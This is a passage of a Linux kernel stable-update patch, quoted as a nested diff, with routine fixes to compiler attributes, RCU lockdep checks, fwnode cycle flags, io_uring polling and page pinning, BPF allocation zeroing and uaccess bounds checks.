+@@ -75,12 +75,6 @@
+ # define __assume_aligned(a, ...)
+ #endif
+ 
+-/*
+- *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-cold-function-attribute
+- *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Label-Attributes.html#index-cold-label-attribute
+- */
+-#define __cold                          __attribute__((__cold__))
+-
+ /*
+  * Note the long name.
+  *
+diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
+index 7c1afe0f4129c..aab34e30128e9 100644
+--- a/include/linux/compiler_types.h
++++ b/include/linux/compiler_types.h
+@@ -79,6 +79,33 @@ static inline void __chk_io_ptr(const volatile void __iomem *ptr) { }
+ /* Attributes */
+ #include <linux/compiler_attributes.h>
+ 
++#if CONFIG_FUNCTION_ALIGNMENT > 0
++#define __function_aligned		__aligned(CONFIG_FUNCTION_ALIGNMENT)
++#else
++#define __function_aligned
++#endif
++
++/*
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-cold-function-attribute
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Label-Attributes.html#index-cold-label-attribute
++ *
++ * When -falign-functions=N is in use, we must avoid the cold attribute as
++ * contemporary versions of GCC drop the alignment for cold functions. Worse,
++ * GCC can implicitly mark callees of cold functions as cold themselves, so
++ * it's not sufficient to add __function_aligned here as that will not ensure
++ * that callees are correctly aligned.
++ *
++ * See:
++ *
++ *   https://lore.kernel.org/lkml/Y77%2FqVgvaJidFpYt@FVFF77S0Q05N
++ *   https://gcc.gnu.org/bugzilla/show_bug.cgi?id=88345#c9
++ */
++#if !defined(CONFIG_CC_IS_GCC) || (CONFIG_FUNCTION_ALIGNMENT == 0)
++#define __cold				__attribute__((__cold__))
++#else
++#define __cold
++#endif
++
+ /* Builtins */
+ 
+ /*
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index dcef4a9e4d63e..d4afa8508a806 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -130,9 +130,36 @@ static __always_inline unsigned long ct_state_inc(int incby)
+ 	return arch_atomic_add_return(incby, this_cpu_ptr(&context_tracking.state));
+ }
+ 
++static __always_inline bool warn_rcu_enter(void)
++{
++	bool ret = false;
++
++	/*
++	 * Horrible hack to shut up recursive RCU isn't watching fail since
++	 * lots of the actual reporting also relies on RCU.
++	 */
++	preempt_disable_notrace();
++	if (rcu_dynticks_curr_cpu_in_eqs()) {
++		ret = true;
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	}
++
++	return ret;
++}
++
++static __always_inline void warn_rcu_exit(bool rcu)
++{
++	if (rcu)
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	preempt_enable_notrace();
++}
++
+ #else
+ static inline void ct_idle_enter(void) { }
+ static inline void ct_idle_exit(void) { }
++
++static __always_inline bool warn_rcu_enter(void) { return false; }
++static __always_inline void warn_rcu_exit(bool rcu) { }
+ #endif /* !CONFIG_CONTEXT_TRACKING_IDLE */
+ 
+ #endif
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 44e3acae7b36e..f4d20655d2d7e 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -328,6 +328,7 @@ enum device_link_state {
+ #define DL_FLAG_MANAGED			BIT(6)
+ #define DL_FLAG_SYNC_STATE_ONLY		BIT(7)
+ #define DL_FLAG_INFERRED		BIT(8)
++#define DL_FLAG_CYCLE			BIT(9)
+ 
+ /**
+  * enum dl_dev_state - Device driver presence tracking information.
+diff --git a/include/linux/fwnode.h b/include/linux/fwnode.h
+index 89b9bdfca925c..5700451b300fb 100644
+--- a/include/linux/fwnode.h
++++ b/include/linux/fwnode.h
+@@ -18,7 +18,7 @@ struct fwnode_operations;
+ struct device;
+ 
+ /*
+- * fwnode link flags
++ * fwnode flags
+  *
+  * LINKS_ADDED:	The fwnode has already be parsed to add fwnode links.
+  * NOT_DEVICE:	The fwnode will never be populated as a struct device.
+@@ -36,6 +36,7 @@ struct device;
+ #define FWNODE_FLAG_INITIALIZED			BIT(2)
+ #define FWNODE_FLAG_NEEDS_CHILD_BOUND_ON_ADD	BIT(3)
+ #define FWNODE_FLAG_BEST_EFFORT			BIT(4)
++#define FWNODE_FLAG_VISITED			BIT(5)
+ 
+ struct fwnode_handle {
+ 	struct fwnode_handle *secondary;
+@@ -46,11 +47,19 @@ struct fwnode_handle {
+ 	u8 flags;
+ };
+ 
++/*
++ * fwnode link flags
++ *
++ * CYCLE:	The fwnode link is part of a cycle. Don't defer probe.
++ */
++#define FWLINK_FLAG_CYCLE			BIT(0)
++
+ struct fwnode_link {
+ 	struct fwnode_handle *supplier;
+ 	struct list_head s_hook;
+ 	struct fwnode_handle *consumer;
+ 	struct list_head c_hook;
++	u8 flags;
+ };
+ 
+ /**
+@@ -198,7 +207,6 @@ static inline void fwnode_dev_initialized(struct fwnode_handle *fwnode,
+ 		fwnode->flags &= ~FWNODE_FLAG_INITIALIZED;
+ }
+ 
+-extern u32 fw_devlink_get_flags(void);
+ extern bool fw_devlink_is_strict(void);
+ int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup);
+ void fwnode_links_purge(struct fwnode_handle *fwnode);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 8677ae38599e4..48563dc09e171 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -619,6 +619,7 @@ struct hid_device {							/* device report descriptor */
+ 	unsigned long status;						/* see STAT flags above */
+ 	unsigned claimed;						/* Claimed by hidinput, hiddev? */
+ 	unsigned quirks;						/* Various quirks the device can pull on us */
++	unsigned initial_quirks;					/* Initial set of quirks supplied when creating device */
+ 	bool io_started;						/* If IO has started */
+ 
+ 	struct list_head inputs;					/* The list of inputs */
+diff --git a/include/linux/ima.h b/include/linux/ima.h
+index 5a0b2a285a18a..d79fee67235ee 100644
+--- a/include/linux/ima.h
++++ b/include/linux/ima.h
+@@ -21,7 +21,8 @@ extern int ima_file_check(struct file *file, int mask);
+ extern void ima_post_create_tmpfile(struct user_namespace *mnt_userns,
+ 				    struct inode *inode);
+ extern void ima_file_free(struct file *file);
+-extern int ima_file_mmap(struct file *file, unsigned long prot);
++extern int ima_file_mmap(struct file *file, unsigned long reqprot,
++			 unsigned long prot, unsigned long flags);
+ extern int ima_file_mprotect(struct vm_area_struct *vma, unsigned long prot);
+ extern int ima_load_data(enum kernel_load_data_id id, bool contents);
+ extern int ima_post_load_data(char *buf, loff_t size,
+@@ -76,7 +77,8 @@ static inline void ima_file_free(struct file *file)
+ 	return;
+ }
+ 
+-static inline int ima_file_mmap(struct file *file, unsigned long prot)
++static inline int ima_file_mmap(struct file *file, unsigned long reqprot,
++				unsigned long prot, unsigned long flags)
+ {
+ 	return 0;
+ }
+diff --git a/include/linux/kernel_stat.h b/include/linux/kernel_stat.h
+index ddb5a358fd829..90e2fdc17d79f 100644
+--- a/include/linux/kernel_stat.h
++++ b/include/linux/kernel_stat.h
+@@ -75,7 +75,7 @@ extern unsigned int kstat_irqs_usr(unsigned int irq);
+ /*
+  * Number of interrupts per cpu, since bootup
+  */
+-static inline unsigned int kstat_cpu_irqs_sum(unsigned int cpu)
++static inline unsigned long kstat_cpu_irqs_sum(unsigned int cpu)
+ {
+ 	return kstat_cpu(cpu).irqs_sum;
+ }
+diff --git a/include/linux/kprobes.h b/include/linux/kprobes.h
+index a0b92be98984e..85a64cb95d755 100644
+--- a/include/linux/kprobes.h
++++ b/include/linux/kprobes.h
+@@ -378,6 +378,8 @@ extern void opt_pre_handler(struct kprobe *p, struct pt_regs *regs);
+ DEFINE_INSN_CACHE_OPS(optinsn);
+ 
+ extern void wait_for_kprobe_optimizer(void);
++bool optprobe_queued_unopt(struct optimized_kprobe *op);
++bool kprobe_disarmed(struct kprobe *p);
+ #else /* !CONFIG_OPTPROBES */
+ static inline void wait_for_kprobe_optimizer(void) { }
+ #endif /* CONFIG_OPTPROBES */
+diff --git a/include/linux/libnvdimm.h b/include/linux/libnvdimm.h
+index af38252ad7045..e772aae718431 100644
+--- a/include/linux/libnvdimm.h
++++ b/include/linux/libnvdimm.h
+@@ -41,6 +41,9 @@ enum {
+ 	 */
+ 	NDD_INCOHERENT = 7,
+ 
++	/* dimm provider wants synchronous registration by __nvdimm_create() */
++	NDD_REGISTER_SYNC = 8,
++
+ 	/* need to set a limit somewhere, but yes, this is likely overkill */
+ 	ND_IOCTL_MAX_BUFLEN = SZ_4M,
+ 	ND_CMD_MAX_ELEM = 5,
+diff --git a/include/linux/mlx4/qp.h b/include/linux/mlx4/qp.h
+index 9db93e487496a..b6b626157b03a 100644
+--- a/include/linux/mlx4/qp.h
++++ b/include/linux/mlx4/qp.h
+@@ -446,6 +446,7 @@ enum {
+ 
+ struct mlx4_wqe_inline_seg {
+ 	__be32			byte_count;
++	__u8			data[];
+ };
+ 
+ enum mlx4_update_qp_attr {
+diff --git a/include/linux/msi.h b/include/linux/msi.h
+index a112b913fff94..15dd71817996f 100644
+--- a/include/linux/msi.h
++++ b/include/linux/msi.h
+@@ -631,6 +631,8 @@ int msi_domain_prepare_irqs(struct irq_domain *domain, struct device *dev,
+ 			    int nvec, msi_alloc_info_t *args);
+ int msi_domain_populate_irqs(struct irq_domain *domain, struct device *dev,
+ 			     int virq, int nvec, msi_alloc_info_t *args);
++void msi_domain_depopulate_descs(struct device *dev, int virq, int nvec);
++
+ struct irq_domain *
+ __platform_msi_create_device_domain(struct device *dev,
+ 				    unsigned int nvec,
+diff --git a/include/linux/nfs_ssc.h b/include/linux/nfs_ssc.h
+index 75843c00f326a..22265b1ff0800 100644
+--- a/include/linux/nfs_ssc.h
++++ b/include/linux/nfs_ssc.h
+@@ -53,6 +53,7 @@ static inline void nfs42_ssc_close(struct file *filep)
+ 	if (nfs_ssc_client_tbl.ssc_nfs4_ops)
+ 		(*nfs_ssc_client_tbl.ssc_nfs4_ops->sco_close)(filep);
+ }
++#endif
+ 
+ struct nfsd4_ssc_umount_item {
+ 	struct list_head nsui_list;
+@@ -66,7 +67,6 @@ struct nfsd4_ssc_umount_item {
+ 	struct vfsmount *nsui_vfsmount;
+ 	char nsui_ipaddr[RPC_MAX_ADDRBUFLEN + 1];
+ };
+-#endif
+ 
+ /*
+  * NFS_FS
+diff --git a/include/linux/poison.h b/include/linux/poison.h
+index 2d3249eb0e62d..0e8a1f2ceb2f1 100644
+--- a/include/linux/poison.h
++++ b/include/linux/poison.h
+@@ -84,4 +84,7 @@
+ /********** kernel/bpf/ **********/
+ #define BPF_PTR_POISON ((void *)(0xeB9FUL + POISON_POINTER_DELTA))
+ 
++/********** VFS **********/
++#define VFS_PTR_POISON ((void *)(0xF5 + POISON_POINTER_DELTA))
++
+ #endif
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 03abf883a281b..8d4bf695e7666 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -238,6 +238,7 @@ void synchronize_rcu_tasks_rude(void);
+ 
+ #define rcu_note_voluntary_context_switch(t) rcu_tasks_qs(t, false)
+ void exit_tasks_rcu_start(void);
++void exit_tasks_rcu_stop(void);
+ void exit_tasks_rcu_finish(void);
+ #else /* #ifdef CONFIG_TASKS_RCU_GENERIC */
+ #define rcu_tasks_classic_qs(t, preempt) do { } while (0)
+@@ -246,6 +247,7 @@ void exit_tasks_rcu_finish(void);
+ #define call_rcu_tasks call_rcu
+ #define synchronize_rcu_tasks synchronize_rcu
+ static inline void exit_tasks_rcu_start(void) { }
++static inline void exit_tasks_rcu_stop(void) { }
+ static inline void exit_tasks_rcu_finish(void) { }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU_GENERIC */
+ 
+@@ -374,11 +376,18 @@ static inline int debug_lockdep_rcu_enabled(void)
+  * RCU_LOCKDEP_WARN - emit lockdep splat if specified condition is met
+  * @c: condition to check
+  * @s: informative message
++ *
++ * This checks debug_lockdep_rcu_enabled() before checking (c) to
++ * prevent early boot splats due to lockdep not yet being initialized,
++ * and rechecks it after checking (c) to prevent false-positive splats
++ * due to races with lockdep being disabled.  See commit 3066820034b5dd
++ * ("rcu: Reject RCU_LOCKDEP_WARN() false positives") for more detail.
+  */
+ #define RCU_LOCKDEP_WARN(c, s)						\
+ 	do {								\
+ 		static bool __section(".data.unlikely") __warned;	\
+-		if ((c) && debug_lockdep_rcu_enabled() && !__warned) {	\
++		if (debug_lockdep_rcu_enabled() && (c) &&		\
++		    debug_lockdep_rcu_enabled() && !__warned) {		\
+ 			__warned = true;				\
+ 			lockdep_rcu_suspicious(__FILE__, __LINE__, s);	\
+ 		}							\
+diff --git a/include/linux/rmap.h b/include/linux/rmap.h
+index bd3504d11b155..2bdba700bc3e3 100644
+--- a/include/linux/rmap.h
++++ b/include/linux/rmap.h
+@@ -94,7 +94,7 @@ enum ttu_flags {
+ 	TTU_SPLIT_HUGE_PMD	= 0x4,	/* split huge PMD if any */
+ 	TTU_IGNORE_MLOCK	= 0x8,	/* ignore mlock */
+ 	TTU_SYNC		= 0x10,	/* avoid racy checks with PVMW_SYNC */
+-	TTU_IGNORE_HWPOISON	= 0x20,	/* corrupted page is recoverable */
++	TTU_HWPOISON		= 0x20,	/* do convert pte to hwpoison entry */
+ 	TTU_BATCH_FLUSH		= 0x40,	/* Batch TLB flushes where possible
+ 					 * and caller guarantees they will
+ 					 * do a final flush if necessary */
+diff --git a/include/linux/transport_class.h b/include/linux/transport_class.h
+index 63076fb835e34..2efc271a96fa6 100644
+--- a/include/linux/transport_class.h
++++ b/include/linux/transport_class.h
+@@ -70,8 +70,14 @@ void transport_destroy_device(struct device *);
+ static inline int
+ transport_register_device(struct device *dev)
+ {
++	int ret;
++
+ 	transport_setup_device(dev);
+-	return transport_add_device(dev);
++	ret = transport_add_device(dev);
++	if (ret)
++		transport_destroy_device(dev);
++
++	return ret;
+ }
+ 
+ static inline void
+diff --git a/include/linux/uaccess.h b/include/linux/uaccess.h
+index afb18f198843b..ab9728138ad67 100644
+--- a/include/linux/uaccess.h
++++ b/include/linux/uaccess.h
+@@ -329,6 +329,10 @@ copy_struct_from_user(void *dst, size_t ksize, const void __user *src,
+ 	size_t size = min(ksize, usize);
+ 	size_t rest = max(ksize, usize) - size;
+ 
++	/* Double check if ksize is larger than a known object size. */
++	if (WARN_ON_ONCE(ksize > __builtin_object_size(dst, 1)))
++		return -E2BIG;
++
+ 	/* Deal with trailing bytes. */
+ 	if (usize < ksize) {
+ 		memset(dst + size, 0, rest);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 5562097276336..c6584a3524638 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1956,7 +1956,12 @@ void sk_common_release(struct sock *sk);
+  *	Default socket callbacks and setup code
+  */
+ 
+-/* Initialise core socket variables */
++/* Initialise core socket variables using an explicit uid. */
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid);
++
++/* Initialise core socket variables.
++ * Assumes struct socket *sock is embedded in a struct socket_alloc.
++ */
+ void sock_init_data(struct socket *sock, struct sock *sk);
+ 
+ /*
+diff --git a/include/sound/hda_codec.h b/include/sound/hda_codec.h
+index eba23daf2c290..bbb7805e85d8e 100644
+--- a/include/sound/hda_codec.h
++++ b/include/sound/hda_codec.h
+@@ -259,6 +259,7 @@ struct hda_codec {
+ 	unsigned int relaxed_resume:1;	/* don't resume forcibly for jack */
+ 	unsigned int forced_resume:1; /* forced resume for jack */
+ 	unsigned int no_stream_clean_at_suspend:1; /* do not clean streams at suspend */
++	unsigned int ctl_dev_id:1; /* old control element id build behaviour */
+ 
+ #ifdef CONFIG_PM
+ 	unsigned long power_on_acct;
+diff --git a/include/sound/soc-dapm.h b/include/sound/soc-dapm.h
+index 77495e5988c12..64915ebd641ee 100644
+--- a/include/sound/soc-dapm.h
++++ b/include/sound/soc-dapm.h
+@@ -16,6 +16,7 @@
+ #include <sound/asoc.h>
+ 
+ struct device;
++struct snd_pcm_substream;
+ struct snd_soc_pcm_runtime;
+ struct soc_enum;
+ 
+diff --git a/include/trace/events/devlink.h b/include/trace/events/devlink.h
+index 24969184c5348..77ff7cfc6049a 100644
+--- a/include/trace/events/devlink.h
++++ b/include/trace/events/devlink.h
+@@ -88,7 +88,7 @@ TRACE_EVENT(devlink_health_report,
+ 		__string(bus_name, devlink_to_dev(devlink)->bus->name)
+ 		__string(dev_name, dev_name(devlink_to_dev(devlink)))
+ 		__string(driver_name, devlink_to_dev(devlink)->driver->name)
+-		__string(reporter_name, msg)
++		__string(reporter_name, reporter_name)
+ 		__string(msg, msg)
+ 	),
+ 
+diff --git a/include/uapi/linux/io_uring.h b/include/uapi/linux/io_uring.h
+index 2780bce62fafe..434f62e0fb72c 100644
+--- a/include/uapi/linux/io_uring.h
++++ b/include/uapi/linux/io_uring.h
+@@ -625,7 +625,7 @@ struct io_uring_buf_ring {
+ 			__u16	resv3;
+ 			__u16	tail;
+ 		};
+-		struct io_uring_buf	bufs[0];
++		__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
+ 	};
+ };
+ 
+diff --git a/include/uapi/linux/vfio.h b/include/uapi/linux/vfio.h
+index 23105eb036fa6..0552e8dcf0cbf 100644
+--- a/include/uapi/linux/vfio.h
++++ b/include/uapi/linux/vfio.h
+@@ -49,7 +49,11 @@
+ /* Supports VFIO_DMA_UNMAP_FLAG_ALL */
+ #define VFIO_UNMAP_ALL			9
+ 
+-/* Supports the vaddr flag for DMA map and unmap */
++/*
++ * Supports the vaddr flag for DMA map and unmap.  Not supported for mediated
++ * devices, so this capability is subject to change as groups are added or
++ * removed.
++ */
+ #define VFIO_UPDATE_VADDR		10
+ 
+ /*
+@@ -1343,8 +1347,7 @@ struct vfio_iommu_type1_info_dma_avail {
+  * Map process virtual addresses to IO virtual addresses using the
+  * provided struct vfio_dma_map. Caller sets argsz. READ &/ WRITE required.
+  *
+- * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova, and
+- * unblock translation of host virtual addresses in the iova range.  The vaddr
++ * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova. The vaddr
+  * must have previously been invalidated with VFIO_DMA_UNMAP_FLAG_VADDR.  To
+  * maintain memory consistency within the user application, the updated vaddr
+  * must address the same memory object as originally mapped.  Failure to do so
+@@ -1395,9 +1398,9 @@ struct vfio_bitmap {
+  * must be 0.  This cannot be combined with the get-dirty-bitmap flag.
+  *
+  * If flags & VFIO_DMA_UNMAP_FLAG_VADDR, do not unmap, but invalidate host
+- * virtual addresses in the iova range.  Tasks that attempt to translate an
+- * iova's vaddr will block.  DMA to already-mapped pages continues.  This
+- * cannot be combined with the get-dirty-bitmap flag.
++ * virtual addresses in the iova range.  DMA to already-mapped pages continues.
++ * Groups may not be added to the container while any addresses are invalid.
++ * This cannot be combined with the get-dirty-bitmap flag.
+  */
+ struct vfio_iommu_type1_dma_unmap {
+ 	__u32	argsz;
+diff --git a/include/ufs/ufshcd.h b/include/ufs/ufshcd.h
+index 727084cd79be4..97a09a14c6349 100644
+--- a/include/ufs/ufshcd.h
++++ b/include/ufs/ufshcd.h
+@@ -566,9 +566,9 @@ enum ufshcd_quirks {
+ 	UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING = 1 << 13,
+ 
+ 	/*
+-	 * This quirk allows only sg entries aligned with page size.
++	 * Align DMA SG entries on a 4 KiB boundary.
+ 	 */
+-	UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE		= 1 << 14,
++	UFSHCD_QUIRK_4KB_DMA_ALIGNMENT			= 1 << 14,
+ 
+ 	/*
+ 	 * This quirk needs to be enabled if the host controller does not
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index db623b3185c82..a4e9dbc7b67a8 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1143,10 +1143,16 @@ static unsigned int handle_tw_list(struct llist_node *node,
+ 			/* if not contended, grab and improve batching */
+ 			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 			percpu_ref_get(&(*ctx)->refs);
+-		}
++		} else if (!*locked)
++			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 		req->io_task_work.func(req, locked);
+ 		node = next;
+ 		count++;
++		if (unlikely(need_resched())) {
++			ctx_flush_and_put(*ctx, locked);
++			*ctx = NULL;
++			cond_resched();
++		}
+ 	}
+ 
+ 	return count;
+@@ -1722,7 +1728,7 @@ int io_req_prep_async(struct io_kiocb *req)
+ 	const struct io_op_def *def = &io_op_defs[req->opcode];
+ 
+ 	/* assign early for deferred execution for non-fixed file */
+-	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE))
++	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE) && !req->file)
+ 		req->file = io_file_get_normal(req, req->cqe.fd);
+ 	if (!def->prep_async)
+ 		return 0;
+@@ -2790,7 +2796,7 @@ static __poll_t io_uring_poll(struct file *file, poll_table *wait)
+ 	 * pushes them to do the flush.
+ 	 */
+ 
+-	if (io_cqring_events(ctx) || io_has_work(ctx))
++	if (__io_cqring_events_user(ctx) || io_has_work(ctx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 
+ 	return mask;
+@@ -3053,6 +3059,7 @@ static __cold bool io_uring_try_cancel_requests(struct io_ring_ctx *ctx,
+ 		while (!wq_list_empty(&ctx->iopoll_list)) {
+ 			io_iopoll_try_reap_events(ctx);
+ 			ret = true;
++			cond_resched();
+ 		}
+ 	}
+ 
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index ab4b2a1c3b7e8..87426c0c6d3e5 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/errno.h>
+ #include <linux/lockdep.h>
++#include <linux/resume_user_mode.h>
+ #include <linux/io_uring_types.h>
+ #include <uapi/linux/eventpoll.h>
+ #include "io-wq.h"
+@@ -270,6 +271,15 @@ static inline int io_run_task_work(void)
+ 	 */
+ 	if (test_thread_flag(TIF_NOTIFY_SIGNAL))
+ 		clear_notify_signal();
++	/*
++	 * PF_IO_WORKER never returns to userspace, so check here if we have
++	 * notify work that needs processing.
++	 */
++	if (current->flags & PF_IO_WORKER &&
++	    test_thread_flag(TIF_NOTIFY_RESUME)) {
++		__set_current_state(TASK_RUNNING);
++		resume_user_mode_work(NULL);
++	}
+ 	if (task_work_pending(current)) {
+ 		__set_current_state(TASK_RUNNING);
+ 		task_work_run();
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 90326b2799657..02587f7d5908d 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -568,7 +568,7 @@ int io_recvmsg_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	sr->flags = READ_ONCE(sqe->ioprio);
+ 	if (sr->flags & ~(RECVMSG_FLAGS))
+ 		return -EINVAL;
+-	sr->msg_flags = READ_ONCE(sqe->msg_flags) | MSG_NOSIGNAL;
++	sr->msg_flags = READ_ONCE(sqe->msg_flags);
+ 	if (sr->msg_flags & MSG_DONTWAIT)
+ 		req->flags |= REQ_F_NOWAIT;
+ 	if (sr->msg_flags & MSG_ERRQUEUE)
+diff --git a/io_uring/opdef.c b/io_uring/opdef.c
+index 3aa0d65c50e34..be45b76649a08 100644
+--- a/io_uring/opdef.c
++++ b/io_uring/opdef.c
+@@ -313,6 +313,7 @@ const struct io_op_def io_op_defs[] = {
+ 	},
+ 	[IORING_OP_MADVISE] = {
+ 		.name			= "MADVISE",
++		.audit_skip		= 1,
+ 		.prep			= io_madvise_prep,
+ 		.issue			= io_madvise,
+ 	},
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 2ac1366adbd77..fea739eef56f4 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -650,6 +650,14 @@ static void io_async_queue_proc(struct file *file, struct wait_queue_head *head,
+ 	__io_queue_proc(&apoll->poll, pt, head, &apoll->double_poll);
+ }
+ 
++/*
++ * We can't reliably detect loops in repeated poll triggers and issue
++ * subsequently failing. But rather than fail these immediately, allow a
++ * certain amount of retries before we give up. Given that this condition
++ * should _rarely_ trigger even once, we should be fine with a larger value.
++ */
++#define APOLL_MAX_RETRY		128
++
+ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 					     unsigned issue_flags)
+ {
+@@ -665,14 +673,18 @@ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 		if (entry == NULL)
+ 			goto alloc_apoll;
+ 		apoll = container_of(entry, struct async_poll, cache);
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	} else {
+ alloc_apoll:
+ 		apoll = kmalloc(sizeof(*apoll), GFP_ATOMIC);
+ 		if (unlikely(!apoll))
+ 			return NULL;
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	}
+ 	apoll->double_poll = NULL;
+ 	req->apoll = apoll;
++	if (unlikely(!--apoll->poll.retries))
++		return NULL;
+ 	return apoll;
+ }
+ 
+@@ -694,8 +706,6 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 		return IO_APOLL_ABORTED;
+ 	if (!file_can_poll(req->file))
+ 		return IO_APOLL_ABORTED;
+-	if ((req->flags & (REQ_F_POLLED|REQ_F_PARTIAL_IO)) == REQ_F_POLLED)
+-		return IO_APOLL_ABORTED;
+ 	if (!(req->flags & REQ_F_APOLL_MULTISHOT))
+ 		mask |= EPOLLONESHOT;
+ 
+diff --git a/io_uring/poll.h b/io_uring/poll.h
+index 5f3bae50fc81a..b2393b403a2c2 100644
+--- a/io_uring/poll.h
++++ b/io_uring/poll.h
+@@ -12,6 +12,7 @@ struct io_poll {
+ 	struct file			*file;
+ 	struct wait_queue_head		*head;
+ 	__poll_t			events;
++	int				retries;
+ 	struct wait_queue_entry		wait;
+ };
+ 
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 18de10c68a151..4cbf3ad725d13 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -1162,14 +1162,17 @@ struct page **io_pin_pages(unsigned long ubuf, unsigned long len, int *npages)
+ 	pret = pin_user_pages(ubuf, nr_pages, FOLL_WRITE | FOLL_LONGTERM,
+ 			      pages, vmas);
+ 	if (pret == nr_pages) {
++		struct file *file = vmas[0]->vm_file;
++
+ 		/* don't support file backed memory */
+ 		for (i = 0; i < nr_pages; i++) {
+-			struct vm_area_struct *vma = vmas[i];
+-
+-			if (vma_is_shmem(vma))
++			if (vmas[i]->vm_file != file) {
++				ret = -EINVAL;
++				break;
++			}
++			if (!file)
+ 				continue;
+-			if (vma->vm_file &&
+-			    !is_file_hugepages(vma->vm_file)) {
++			if (!vma_is_shmem(vmas[i]) && !is_file_hugepages(file)) {
+ 				ret = -EOPNOTSUPP;
+ 				break;
+ 			}
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index b7017cae6fd1e..530e200fbc477 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -5573,6 +5573,7 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	if (!ctx_struct)
+ 		/* should not happen */
+ 		return NULL;
++again:
+ 	ctx_tname = btf_name_by_offset(btf_vmlinux, ctx_struct->name_off);
+ 	if (!ctx_tname) {
+ 		/* should not happen */
+@@ -5586,8 +5587,16 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	 * int socket_filter_bpf_prog(struct __sk_buff *skb)
+ 	 * { // no fields of skb are ever used }
+ 	 */
+-	if (strcmp(ctx_tname, tname))
+-		return NULL;
++	if (strcmp(ctx_tname, tname)) {
++		/* bpf_user_pt_regs_t is a typedef, so resolve it to
++		 * underlying struct and check name again
++		 */
++		if (!btf_type_is_modifier(ctx_struct))
++			return NULL;
++		while (btf_type_is_modifier(ctx_struct))
++			ctx_struct = btf_type_by_id(btf_vmlinux, ctx_struct->type);
++		goto again;
++	}
+ 	return ctx_type;
+ }
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 66bded1443773..5dfcb5ad0d068 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1004,8 +1004,6 @@ static struct htab_elem *alloc_htab_elem(struct bpf_htab *htab, void *key,
+ 			l_new = ERR_PTR(-ENOMEM);
+ 			goto dec_count;
+ 		}
+-		check_and_init_map_value(&htab->map,
+-					 l_new->key + round_up(key_size, 8));
+ 	}
+ 
+ 	memcpy(l_new->key, key, key_size);
+@@ -1592,6 +1590,7 @@ static int __htab_map_lookup_and_delete_elem(struct bpf_map *map, void *key,
+ 			else
+ 				copy_map_value(map, value, l->key +
+ 					       roundup_key_size);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, value);
+ 		}
+ 
+@@ -1792,6 +1791,7 @@ again_nocopy:
+ 						      true);
+ 			else
+ 				copy_map_value(map, dst_val, value);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, dst_val);
+ 		}
+ 		if (do_delete) {
+diff --git a/kernel/bpf/memalloc.c b/kernel/bpf/memalloc.c
+index 1db156405b68b..7b784823a52ef 100644
+--- a/kernel/bpf/memalloc.c
++++ b/kernel/bpf/memalloc.c
+@@ -143,7 +143,7 @@ static void *__alloc(struct bpf_mem_cache *c, int node)
+ 		return obj;
+ 	}
+ 
+-	return kmalloc_node(c->unit_size, flags, node);
++	return kmalloc_node(c->unit_size, flags | __GFP_ZERO, node);
+ }
+ 
+ static struct mem_cgroup *get_memcg(const struct bpf_mem_cache *c)
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
